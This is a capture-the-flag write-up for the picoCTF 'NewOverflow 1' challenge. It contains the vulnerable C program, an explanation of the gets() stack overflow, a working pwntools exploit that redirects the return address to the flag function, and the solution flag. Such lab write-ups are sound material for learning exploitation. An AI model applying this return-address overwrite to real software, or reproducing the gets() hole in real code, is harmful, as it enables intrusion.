Skip to content

NewOverflow 1

cheaterdxd edited this page Oct 10, 2019 · 1 revision

Question

Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_5_bd04c7682164df72135e036dd527b668 on the shell server. Source.

Hints

Now that we're in 64-bit, what used to be 4 bytes, now may be 8 bytes

Source code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

void flag() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFFSIZE];
  gets(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
  vuln();
  return 0;
}

Exploit

You can see in vuln() function. The gets(buf) don't check the number of characters we can input. So, this cause the buffer overflow.

We can use the gets() to overwrite the return address of vuln function and make the flow of programe return to flag.

Pesudo payload

payload = 'a'*offset + flag_address

Real payload

There's something wrong on server, so with the pesudo payload , we can't get flag. So, i have tried a ret ROP to make the payload more smoothly.

from pwn import *
s = process('./vuln')
flag = 0x400767 
ret = 0x00000000004005de 
payload = 0x48*'a'
payload += p64(ret) 
payload += p64(flag)
s.sendline(payload)
s.interactive()

Flag

picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_351346a2}

Clone this wiki locally